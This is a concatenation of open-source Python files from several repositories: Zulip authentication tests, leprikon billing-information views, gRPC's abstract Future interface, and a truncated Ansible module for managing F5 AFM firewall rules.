def test_require_email_format_usernames_for_ldap_with_email_attr(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',),
LDAP_EMAIL_ATTR="email"):
realm = Realm.objects.get(string_id='zulip')
self.assertFalse(require_email_format_usernames(realm))
def test_require_email_format_usernames_for_email_only(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',)):
realm = Realm.objects.get(string_id='zulip')
self.assertTrue(require_email_format_usernames(realm))
def test_require_email_format_usernames_for_email_and_ldap_with_email_attr(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',
'zproject.backends.ZulipLDAPAuthBackend'),
LDAP_EMAIL_ATTR="email"):
realm = Realm.objects.get(string_id='zulip')
self.assertFalse(require_email_format_usernames(realm))
def test_require_email_format_usernames_for_email_and_ldap_with_append_email(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',
'zproject.backends.ZulipLDAPAuthBackend'),
LDAP_APPEND_DOMAIN="zulip.com"):
realm = Realm.objects.get(string_id='zulip')
self.assertFalse(require_email_format_usernames(realm))
class TestMaybeSendToRegistration(ZulipTestCase):
def test_sso_only_when_preregistration_user_does_not_exist(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/')
request.session = {}
request.user = None
# Creating a mock Django form in order to keep the test simple.
# This form will be returned by the create_hompage_form function
# and will always be valid so that the code that we want to test
# actually runs.
class Form(object):
def is_valid(self):
# type: () -> bool
return True
with self.settings(ONLY_SSO=True):
with mock.patch('zerver.views.auth.HomepageForm', return_value=Form()):
self.assertEqual(PreregistrationUser.objects.all().count(), 0)
result = maybe_send_to_registration(request, self.example_email("hamlet"))
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
self.assertEqual(PreregistrationUser.objects.all().count(), 1)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
self.assert_in_response('value="{0}" name="key"'.format(confirmation_key), result)
def test_sso_only_when_preregistration_user_exists(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/')
request.session = {}
request.user = None
# Creating a mock Django form in order to keep the test simple.
# This form will be returned by the create_hompage_form function
# and will always be valid so that the code that we want to test
# actually runs.
class Form(object):
def is_valid(self):
# type: () -> bool
return True
email = self.example_email("hamlet")
user = PreregistrationUser(email=email)
user.save()
with self.settings(ONLY_SSO=True):
with mock.patch('zerver.views.auth.HomepageForm', return_value=Form()):
self.assertEqual(PreregistrationUser.objects.all().count(), 1)
result = maybe_send_to_registration(request, email)
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
self.assertEqual(PreregistrationUser.objects.all().count(), 1)
class TestAdminSetBackends(ZulipTestCase):
def test_change_enabled_backends(self):
# type: () -> None
# Log in as admin
self.login(self.example_email("iago"))
result = self.client_patch("/json/realm", {
'authentication_methods': ujson.dumps({u'Email': False, u'Dev': True})})
self.assert_json_success(result)
realm = get_realm('zulip')
self.assertFalse(password_auth_enabled(realm))
self.assertTrue(dev_auth_enabled(realm))
def test_disable_all_backends(self):
# type: () -> None
# Log in as admin
self.login(self.example_email("iago"))
result = self.client_patch("/json/realm", {
'authentication_methods': ujson.dumps({u'Email': False, u'Dev': False})})
self.assert_json_error(result, 'At least one authentication method must be enabled.')
realm = get_realm('zulip')
self.assertTrue(password_auth_enabled(realm))
self.assertTrue(dev_auth_enabled(realm))
def test_supported_backends_only_updated(self):
# type: () -> None
# Log in as admin
self.login(self.example_email("iago"))
# Set some supported and unsupported backends
result = self.client_patch("/json/realm", {
'authentication_methods': ujson.dumps({u'Email': False, u'Dev': True, u'GitHub': False})})
self.assert_json_success(result)
realm = get_realm('zulip')
# Check that unsupported backend is not enabled
self.assertFalse(github_auth_enabled(realm))
self.assertTrue(dev_auth_enabled(realm))
self.assertFalse(password_auth_enabled(realm))
class LoginEmailValidatorTestCase(ZulipTestCase):
def test_valid_email(self):
# type: () -> None
validate_login_email(self.example_email("hamlet"))
def test_invalid_email(self):
# type: () -> None
with self.assertRaises(JsonableError):
validate_login_email(u'hamlet')
class LoginOrRegisterRemoteUserTestCase(ZulipTestCase):
def test_invalid_subdomain(self):
# type: () -> None
full_name = 'Hamlet'
invalid_subdomain = True
user_profile = self.example_user('hamlet')
request = POSTRequestMock({}, user_profile)
response = login_or_register_remote_user(
request,
self.example_email('hamlet'),
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
self.assertIn('/accounts/login/?subdomain=1', response.url)
class LDAPBackendTest(ZulipTestCase):
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_non_existing_realm(self):
# type: () -> None
email = self.example_email('hamlet')
data = {'username': email, 'password': initial_password(email)}
error_type = ZulipLDAPAuthBackend.REALM_IS_NONE_ERROR
error = ZulipLDAPConfigurationError('Realm is None', error_type)
with mock.patch('zproject.backends.ZulipLDAPAuthBackend.get_or_create_user',
side_effect=error), \
mock.patch('django_auth_ldap.backend._LDAPUser._authenticate_user_dn'):
response = self.client_post('/login/', data)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('ldap_error_realm_is_none'))
response = self.client_get(response.url)
self.assert_in_response('You are trying to login using LDAP '
'without creating an',
response)
|
leprikon-cz/leprikon | refs/heads/master | leprikon/views/billing_info.py | 1 | from django.utils.translation import ugettext_lazy as _
from ..forms.billing_info import BillingInfoForm
from ..models.roles import BillingInfo
from ..utils import reverse_with_back
from .generic import CreateView, DeleteView, ListView, UpdateView
class GetQerysetMixin:
def get_queryset(self):
return self.request.user.leprikon_billing_info.all()
class BillingInfoListView(GetQerysetMixin, ListView):
add_label = _("add billing information")
preview_template = "leprikon/billing_info_preview.html"
def get_title(self):
return _("Billing information")
def get_add_url(self):
return reverse_with_back(self.request, "leprikon:billing_info_create")
class GetFromKwargsMixin:
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.request.user
return kwargs
class BillingInfoCreateView(GetFromKwargsMixin, GetQerysetMixin, CreateView):
form_class = BillingInfoForm
title = _("New billing information")
def get_message(self):
return _("New billing information {} have been created.").format(self.object)
class BillingInfoUpdateView(GetFromKwargsMixin, GetQerysetMixin, UpdateView):
form_class = BillingInfoForm
message = _("Billing information have been updated.")
title = _("Change billing information")
class BillingInfoDeleteView(GetQerysetMixin, DeleteView):
model = BillingInfo
title = _("Delete billing information")
message = _("Billing information have been deleted.")
def get_question(self):
return _("Do You really want to delete the billing information: {}?").format(self.object)
|
grpc/grpc | refs/heads/master | src/python/grpcio/grpc/framework/foundation/future.py | 48 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Future interface.
Python doesn't have a Future interface in its standard library. In the absence
of such a standard, three separate, incompatible implementations
(concurrent.futures.Future, ndb.Future, and asyncio.Future) have appeared. This
interface attempts to be as compatible as possible with
concurrent.futures.Future. From ndb.Future it adopts a traceback-object accessor
method.
Unlike the concrete and implemented Future classes listed above, the Future
class defined in this module is an entirely abstract interface that anyone may
implement and use.
The one known incompatibility between this interface and the interface of
concurrent.futures.Future is that this interface defines its own CancelledError
and TimeoutError exceptions rather than raising the implementation-private
concurrent.futures._base.CancelledError and the
built-in-but-only-in-3.3-and-later TimeoutError.
"""
import abc
import six
class TimeoutError(Exception):
"""Indicates that a particular call timed out."""
class CancelledError(Exception):
"""Indicates that the computation underlying a Future was cancelled."""
class Future(six.with_metaclass(abc.ABCMeta)):
"""A representation of a computation in another control flow.
Computations represented by a Future may be yet to be begun, may be ongoing,
or may have already completed.
"""
# NOTE(nathaniel): This isn't the return type that I would want to have if it
# were up to me. Were this interface being written from scratch, the return
# type of this method would probably be a sum type like:
#
# NOT_COMMENCED
# COMMENCED_AND_NOT_COMPLETED
# PARTIAL_RESULT<Partial_Result_Type>
# COMPLETED<Result_Type>
# UNCANCELLABLE
# NOT_IMMEDIATELY_DETERMINABLE
@abc.abstractmethod
def cancel(self):
"""Attempts to cancel the computation.
This method does not block.
Returns:
True if the computation has not yet begun, will not be allowed to take
place, and determination of both was possible without blocking. False
under all other circumstances including but not limited to the
computation's already having begun, the computation's already having
finished, and the computation's having been scheduled for execution on a
remote system for which a determination of whether or not it commenced
before being cancelled cannot be made without blocking.
"""
raise NotImplementedError()
# NOTE(nathaniel): Here too this isn't the return type that I'd want this
# method to have if it were up to me. I think I'd go with another sum type
# like:
#
# NOT_CANCELLED (this object's cancel method hasn't been called)
# NOT_COMMENCED
# COMMENCED_AND_NOT_COMPLETED
# PARTIAL_RESULT<Partial_Result_Type>
# COMPLETED<Result_Type>
# UNCANCELLABLE
# NOT_IMMEDIATELY_DETERMINABLE
#
# Notice how giving the cancel method the right semantics obviates most
# reasons for this method to exist.
@abc.abstractmethod
def cancelled(self):
"""Describes whether the computation was cancelled.
This method does not block.
Returns:
True if the computation was cancelled any time before its result became
immediately available. False under all other circumstances including but
not limited to this object's cancel method not having been called and
the computation's result having become immediately available.
"""
raise NotImplementedError()
@abc.abstractmethod
def running(self):
"""Describes whether the computation is taking place.
This method does not block.
Returns:
True if the computation is scheduled to take place in the future or is
taking place now, or False if the computation took place in the past or
was cancelled.
"""
raise NotImplementedError()
# NOTE(nathaniel): These aren't quite the semantics I'd like here either. I
# would rather this only returned True in cases in which the underlying
# computation completed successfully. A computation's having been cancelled
# conflicts with considering that computation "done".
@abc.abstractmethod
def done(self):
"""Describes whether the computation has taken place.
This method does not block.
Returns:
True if the computation is known to have either completed or have been
unscheduled or interrupted. False if the computation may possibly be
executing or scheduled to execute later.
"""
raise NotImplementedError()
@abc.abstractmethod
def result(self, timeout=None):
"""Accesses the outcome of the computation or raises its exception.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
finish or be cancelled, or None if this method should block until the
computation has finished or is cancelled no matter how long that takes.
Returns:
The return value of the computation.
Raises:
TimeoutError: If a timeout value is passed and the computation does not
terminate within the allotted time.
CancelledError: If the computation was cancelled.
Exception: If the computation raised an exception, this call will raise
the same exception.
"""
raise NotImplementedError()
@abc.abstractmethod
def exception(self, timeout=None):
"""Return the exception raised by the computation.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
terminate or be cancelled, or None if this method should block until
the computation is terminated or is cancelled no matter how long that
takes.
Returns:
The exception raised by the computation, or None if the computation did
not raise an exception.
Raises:
TimeoutError: If a timeout value is passed and the computation does not
terminate within the allotted time.
CancelledError: If the computation was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
terminate or be cancelled, or None if this method should block until
the computation is terminated or is cancelled no matter how long that
takes.
Returns:
The traceback of the exception raised by the computation, or None if the
computation did not raise an exception.
Raises:
TimeoutError: If a timeout value is passed and the computation does not
terminate within the allotted time.
CancelledError: If the computation was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_done_callback(self, fn):
"""Adds a function to be called at completion of the computation.
The callback will be passed this Future object describing the outcome of
the computation.
If the computation has already completed, the callback will be called
immediately.
Args:
fn: A callable taking this Future object as its single parameter.
"""
raise NotImplementedError()
|
drawks/ansible | refs/heads/devel | lib/ansible/modules/network/f5/bigip_firewall_rule.py | 14 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_firewall_rule
short_description: Manage AFM Firewall rules
description:
- Manages firewall rules in an AFM firewall policy. New rules will always be added to the
end of the policy. Rules can be re-ordered using the C(bigip_security_policy) module.
Rules can also be pre-ordered using the C(bigip_security_policy) module and then later
updated using the C(bigip_firewall_rule) module.
version_added: 2.7
options:
name:
description:
- Specifies the name of the rule.
type: str
required: True
parent_policy:
description:
- The policy which contains the rule to be managed.
- One of either C(parent_policy) or C(parent_rule_list) is required.
type: str
parent_rule_list:
description:
- The rule list which contains the rule to be managed.
- One of either C(parent_policy) or C(parent_rule_list) is required.
type: str
action:
description:
- Specifies the action for the firewall rule.
- When C(accept), allows packets with the specified source, destination,
and protocol to pass through the firewall. Packets that match the rule,
and are accepted, traverse the system as if the firewall is not present.
- When C(drop), drops packets with the specified source, destination, and
protocol. Dropping a packet is a silent action with no notification to
the source or destination systems. Dropping the packet causes the connection
to be retried until the retry threshold is reached.
- When C(reject), rejects packets with the specified source, destination,
and protocol. When a packet is rejected the firewall sends a destination
unreachable message to the sender.
- When C(accept-decisively), allows packets with the specified source,
destination, and protocol to pass through the firewall, and does not require
any further processing by any of the further firewalls. Packets that match
the rule, and are accepted, traverse the system as if the firewall is not
present. If the Rule List is applied to a virtual server, management IP,
or self IP firewall rule, then Accept Decisively is equivalent to Accept.
- When creating a new rule, if this parameter is not provided, the default is
C(reject).
type: str
choices:
- accept
- drop
- reject
- accept-decisively
status:
description:
- Indicates the activity state of the rule or rule list.
- When C(disabled), specifies that the rule or rule list does not apply at all.
- When C(enabled), specifies that the system applies the firewall rule or rule
list to the given context and addresses.
- When C(scheduled), specifies that the system applies the rule or rule list
according to the specified schedule.
- When creating a new rule, if this parameter is not provided, the default
is C(enabled).
type: str
choices:
- enabled
- disabled
- scheduled
schedule:
description:
- Specifies a schedule for the firewall rule.
- You configure schedules to define days and times when the firewall rule is
made active.
type: str
description:
description:
- The rule description.
type: str
irule:
description:
- Specifies an iRule that is applied to the firewall rule.
- An iRule can be started when the firewall rule matches traffic.
type: str
protocol:
description:
- Specifies the protocol to which the rule applies.
- Protocols may be specified by either their name or numeric value.
- A special protocol value C(any) can be specified to match any protocol. The
numeric equivalent of this protocol is C(255).
type: str
source:
description:
- Specifies packet sources to which the rule applies.
- Leaving this field blank applies the rule to all addresses and all ports.
- You can specify the following source items. An IPv4 or IPv6 address, an IPv4
or IPv6 address range, geographic location, VLAN, address list, port,
port range, port list or address list.
- You can specify a mix of different types of items for the source address.
suboptions:
address:
description:
- Specifies a specific IP address.
type: str
address_list:
description:
- Specifies an existing address list.
type: str
address_range:
description:
- Specifies an address range.
type: str
country:
description:
- Specifies a country code.
type: str
port:
description:
- Specifies a single numeric port.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: int
port_list:
description:
- Specifes an existing port list.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: str
port_range:
description:
- Specifies a range of ports, which is two port values separated by
a hyphen. The port to the left of the hyphen should be less than the
port to the right.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: str
vlan:
description:
- Specifies VLANs to which the rule applies.
- The VLAN source refers to the packet's source.
type: str
type: list
destination:
description:
- Specifies packet destinations to which the rule applies.
- Leaving this field blank applies the rule to all addresses and all ports.
- You can specify the following destination items. An IPv4 or IPv6 address,
an IPv4 or IPv6 address range, geographic location, VLAN, address list, port,
port range, port list or address list.
- You can specify a mix of different types of items for the source address.
suboptions:
address:
description:
- Specifies a specific IP address.
type: str
address_list:
description:
- Specifies an existing address list.
type: str
address_range:
description:
- Specifies an address range.
type: str
country:
description:
- Specifies a country code.
type: str
port:
description:
- Specifies a single numeric port.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: int
port_list:
description:
- Specifes an existing port list.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: str
port_range:
description:
- Specifies a range of ports, which is two port values separated by
a hyphen. The port to the left of the hyphen should be less than the
port to the right.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: str
type: list
logging:
description:
- Specifies whether logging is enabled or disabled for the firewall rule.
- When creating a new rule, if this parameter is not specified, the default
if C(no).
type: bool
rule_list:
description:
- Specifies an existing rule list to use in the rule.
- This parameter is mutually exclusive with many of the other individual-rule
specific settings. This includes C(logging), C(action), C(source),
C(destination), C(irule'), C(protocol) and C(logging).
type: str
icmp_message:
description:
- Specifies the Internet Control Message Protocol (ICMP) or ICMPv6 message
C(type) and C(code) that the rule uses.
- This parameter is only relevant when C(protocol) is either C(icmp)(1) or
C(icmpv6)(58).
suboptions:
type:
description:
- Specifies the type of ICMP message.
- You can specify control messages, such as Echo Reply (0) and Destination
Unreachable (3), or you can specify C(any) to indicate that the system
applies the rule for all ICMP messages.
- You can also specify an arbitrary ICMP message.
- The ICMP protocol contains definitions for the existing message type and
number pairs.
type: str
code:
description:
- Specifies the code returned in response to the specified ICMP message type.
- You can specify codes, each set appropriate to the associated type, such
as No Code (0) (associated with Echo Reply (0)) and Host Unreachable (1)
(associated with Destination Unreachable (3)), or you can specify C(any)
to indicate that the system applies the rule for all codes in response to
that specific ICMP message.
- You can also specify an arbitrary code.
- The ICMP protocol contains definitions for the existing message code and
number pairs.
type: str
type: list
partition:
description:
- Device partition to manage resources on.
type: str
default: Common
state:
description:
- When C(state) is C(present), ensures that the rule exists.
- When C(state) is C(absent), ensures that the rule is removed.
type: str
choices:
- present
- absent
default: present
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create a new rule in the foo firewall policy
bigip_firewall_rule:
name: foo
parent_policy: policy1
protocol: tcp
source:
- address: 1.2.3.4
- address: "::1"
- address_list: foo-list1
- address_range: 1.1.1.1-2.2.2.2
- vlan: vlan1
- country: US
- port: 22
- port_list: port-list1
- port_range: 80-443
destination:
- address: 1.2.3.4
- address: "::1"
- address_list: foo-list1
- address_range: 1.1.1.1-2.2.2.2
- country: US
- port: 22
- port_list: port-list1
- port_range: 80-443
irule: irule1
action: accept
logging: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Create an ICMP specific rule
bigip_firewall_rule:
name: foo
protocol: icmp
icmp_message:
type: 0
source:
- country: US
action: drop
logging: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Add a new rule that is uses an existing rule list
bigip_firewall_rule:
name: foo
rule_list: rule-list1
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
name:
description: Name of the rule.
returned: changed
type: str
sample: FooRule
parent_policy:
description: The policy which contains the rule to be managed.
returned: changed
type: str
sample: FooPolicy
parent_rule_list:
description: The rule list which contains the rule to be managed.
returned: changed
type: str
sample: FooRuleList
action:
description: The action for the firewall rule.
returned: changed
type: str
sample: drop
status:
description: The activity state of the rule or rule list.
returned: changed
type: str
sample: scheduled
schedule:
description: The schedule for the firewall rule.
returned: changed
type: str
sample: Foo_schedule
description:
description: The rule description.
returned: changed
type: str
sample: MyRule
irule:
description: The iRule that is applied to the firewall rule.
returned: changed
type: str
sample: _sys_auth_radius
protocol:
description: The protocol to which the rule applies.
returned: changed
type: str
sample: any
source:
description: The packet sources to which the rule applies
returned: changed
type: complex
contains:
address:
description: A specific IP address.
returned: changed
type: str
sample: 192.168.1.1
address_list:
description: An existing address list.
returned: changed
type: str
sample: foo-list1
address_range:
description: The address range.
returned: changed
type: str
sample: 1.1.1.1-2.2.2.2
country:
description: A country code.
returned: changed
type: str
sample: US
port:
description: Single numeric port.
returned: changed
type: int
sample: 8080
port_list:
description: An existing port list.
returned: changed
type: str
sample: port-list1
port_range:
description: The port range.
returned: changed
type: str
sample: 80-443
vlan:
description: Source VLANs for the packets.
returned: changed
type: str
sample: vlan1
sample: hash/dictionary of values
destination:
description: The packet destinations to which the rule applies.
returned: changed
type: complex
contains:
address:
description: A specific IP address.
returned: changed
type: str
sample: 192.168.1.1
address_list:
description: An existing address list.
returned: changed
type: str
sample: foo-list1
address_range:
description: The address range.
returned: changed
type: str
sample: 1.1.1.1-2.2.2.2
country:
description: A country code.
returned: changed
type: str
sample: US
port:
description: Single numeric port.
returned: changed
type: int
sample: 8080
port_list:
description: An existing port list.
returned: changed
type: str
sample: port-list1
port_range:
description: The port range.
returned: changed
type: str
sample: 80-443
sample: hash/dictionary of values
logging:
description: Enable or Disable logging for the firewall rule.
returned: changed
type: bool
sample: yes
rule_list:
description: An existing rule list to use in the rule.
returned: changed
type: str
sample: rule-list-1
icmp_message:
description: The (ICMP) or ICMPv6 message C(type) and C(code) that the rule uses.
returned: changed
type: complex
contains:
type:
description: The type of ICMP message.
returned: changed
type: str
sample: 0
code:
description: The code returned in response to the specified ICMP message type.
returned: changed
type: str
sample: 1
sample: hash/dictionary of values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
class Parameters(AnsibleF5Parameters):
api_map = {
'ipProtocol': 'protocol',
'log': 'logging',
'icmp': 'icmp_message',
}
api_attributes = [
'irule',
'ipProtocol',
'log',
'schedule',
'status',
'destination',
'source',
'icmp',
'action',
'description',
]
returnables = [
'logging',
'protocol',
'irule',
'source',
'destination',
'action',
'status',
'schedule',
'description',
'icmp_message',
]
updatables = [
'logging',
'protocol',
'irule',
'source',
'destination',
'action',
'status',
'schedule',
'description',
'icmp_message',
]
protocol_map = {
'1': 'icmp',
'6': 'tcp',
'17': 'udp',
'58': 'icmpv6',
'255': 'any',
}
class ApiParameters(Parameters):
@property
def logging(self):
if self._values['logging'] is None:
return None
if self._values['logging'] == 'yes':
return True
return False
@property
def protocol(self):
if self._values['protocol'] is None:
return None
if self._values['protocol'] in self.protocol_map:
return self.protocol_map[self._values['protocol']]
return self._values['protocol']
@property
def source(self):
result = []
if self._values['source'] is None:
return None
v = self._values['source']
if 'addressLists' in v:
result += [('address_list', x) for x in v['addressLists']]
if 'vlans' in v:
result += [('vlan', x) for x in v['vlans']]
if 'geo' in v:
result += [('geo', x['name']) for x in v['geo']]
if 'addresses' in v:
result += [('address', x['name']) for x in v['addresses']]
if 'ports' in v:
result += [('port', str(x['name'])) for x in v['ports']]
if 'portLists' in v:
result += [('port_list', x) for x in v['portLists']]
if result:
return result
return None
@property
def destination(self):
result = []
if self._values['destination'] is None:
return None
v = self._values['destination']
if 'addressLists' in v:
result += [('address_list', x) for x in v['addressLists']]
if 'geo' in v:
result += [('geo', x['name']) for x in v['geo']]
if 'addresses' in v:
result += [('address', x['name']) for x in v['addresses']]
if 'ports' in v:
result += [('port', x['name']) for x in v['ports']]
if 'portLists' in v:
result += [('port_list', x) for x in v['portLists']]
if result:
return result
return None
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = [x['name'] for x in self._values['icmp_message']]
return result
class ModuleParameters(Parameters):
@property
def irule(self):
if self._values['irule'] is None:
return None
if self._values['irule'] == '':
return ''
return fq_name(self.partition, self._values['irule'])
@property
def description(self):
if self._values['description'] is None:
return None
if self._values['description'] == '':
return ''
return self._values['description']
@property
def schedule(self):
if self._values['schedule'] is None:
return None
if self._values['schedule'] == '':
return ''
return fq_name(self.partition, self._values['schedule'])
@property
def source(self):
result = []
if self._values['source'] is None:
return None
for x in self._values['source']:
if 'address' in x and x['address'] is not None:
result += [('address', x['address'])]
elif 'address_range' in x and x['address_range'] is not None:
result += [('address', x['address_range'])]
elif 'address_list' in x and x['address_list'] is not None:
result += [('address_list', x['address_list'])]
elif 'country' in x and x['country'] is not None:
result += [('geo', x['country'])]
elif 'vlan' in x and x['vlan'] is not None:
result += [('vlan', fq_name(self.partition, x['vlan']))]
elif 'port' in x and x['port'] is not None:
result += [('port', str(x['port']))]
elif 'port_range' in x and x['port_range'] is not None:
result += [('port', x['port_range'])]
elif 'port_list' in x and x['port_list'] is not None:
result += [('port_list', fq_name(self.partition, x['port_list']))]
if result:
return result
return None
@property
def destination(self):
result = []
if self._values['destination'] is None:
return None
for x in self._values['destination']:
if 'address' in x and x['address'] is not None:
result += [('address', x['address'])]
elif 'address_range' in x and x['address_range'] is not None:
result += [('address', x['address_range'])]
elif 'address_list' in x and x['address_list'] is not None:
result += [('address_list', x['address_list'])]
elif 'country' in x and x['country'] is not None:
result += [('geo', x['country'])]
elif 'port' in x and x['port'] is not None:
result += [('port', str(x['port']))]
elif 'port_range' in x and x['port_range'] is not None:
result += [('port', x['port_range'])]
elif 'port_list' in x and x['port_list'] is not None:
result += [('port_list', fq_name(self.partition, x['port_list']))]
if result:
return result
return None
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = []
for x in self._values['icmp_message']:
type = x.get('type', '255')
code = x.get('code', '255')
if type is None or type == 'any':
type = '255'
if code is None or code == 'any':
code = '255'
if type == '255' and code == '255':
result.append("255")
elif type == '255' and code != '255':
raise F5ModuleError(
"A type of 'any' (255) requires a code of 'any'."
)
elif code == '255':
result.append(type)
else:
result.append('{0}:{1}'.format(type, code))
result = list(set(result))
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
@property
def logging(self):
if self._values['logging'] is None:
return None
if self._values['logging'] is True:
return "yes"
return "no"
@property
def source(self):
if self._values['source'] is None:
return None
result = dict(
addresses=[],
addressLists=[],
vlans=[],
geo=[],
ports=[],
portLists=[]
)
for x in self._values['source']:
if x[0] == 'address':
result['addresses'].append({'name': x[1]})
elif x[0] == 'address_list':
result['addressLists'].append(x[1])
elif x[0] == 'vlan':
result['vlans'].append(x[1])
elif x[0] == 'geo':
result['geo'].append({'name': x[1]})
elif x[0] == 'port':
result['ports'].append({'name': str(x[1])})
elif x[0] == 'port_list':
result['portLists'].append(x[1])
return result
@property
def destination(self):
if self._values['destination'] is None:
return None
result = dict(
addresses=[],
addressLists=[],
vlans=[],
geo=[],
ports=[],
portLists=[]
)
for x in self._values['destination']:
if x[0] == 'address':
result['addresses'].append({'name': x[1]})
elif x[0] == 'address_list':
result['addressLists'].append(x[1])
elif x[0] == 'geo':
result['geo'].append({'name': x[1]})
elif x[0] == 'port':
result['ports'].append({'name': str(x[1])})
elif x[0] == 'port_list':
result['portLists'].append(x[1])
return result
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = []
for x in self._values['icmp_message']:
result.append({'name': x})
return result
class ReportableChanges(Changes):
@property
def source(self):
if self._values['source'] is None:
return None
result = []
v = self._values['source']
if v['addressLists']:
result += [('address_list', x) for x in v['addressLists']]
if v['vlans']:
result += [('vlan', x) for x in v['vlans']]
if v['geo']:
result += [('geo', x['name']) for x in v['geo']]
if v['addresses']:
result += [('address', x['name']) for x in v['addresses']]
if v['ports']:
result += [('port', str(x)) for x in v['ports']]
if v['portLists']:
result += [('port_list', x['name']) for x in v['portLists']]
if result:
return dict(result)
return None
@property
def destination(self):
if self._values['destination'] is None:
return None
result = []
v = self._values['destination']
if v['addressLists']:
result += [('address_list', x) for x in v['addressLists']]
if v['geo']:
result += [('geo', x['name']) for x in v['geo']]
if v['addresses']:
result += [('address', x['name']) for x in v['addresses']]
if v['ports']:
result += [('port', str(x)) for x in v['ports']]
if v['portLists']:
result += [('port_list', x['name']) for x in v['portLists']]
if result:
return dict(result)
return None
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def irule(self):
if self.want.irule is None:
return None
if self.have.irule is None and self.want.irule == '':
return None
if self.have.irule is None:
return self.want.irule
if self.want.irule != self.have.irule:
return self.want.irule
@property
def description(self):
if self.want.description is None:
return None
if self.have.description is None and self.want.description == '':
return None
if self.have.description is None:
return self.want.description
if self.want.description != self.have.description:
return self.want.description
@property
def source(self):
if self.want.source is None:
return None
if self.want.source is None and self.have.source is None:
return None
if self.have.source is None:
return self.want.source
if set(self.want.source) != set(self.have.source):
return self.want.source
@property
def destination(self):
if self.want.destination is None:
return None
if self.want.destination is None and self.have.destination is None:
return None
if self.have.destination is None:
return self.want.destination
if set(self.want.destination) != set(self.have.destination):
return self.want.destination
@property
def icmp_message(self):
if self.want.icmp_message is None:
return None
if self.want.icmp_message is None and self.have.icmp_message is None:
return None
if self.have.icmp_message is None:
return self.want.icmp_message
if set(self.want.icmp_message) != set(self.have.icmp_message):
return self.want.icmp_message
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = F5RestClient(**self.module.params)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
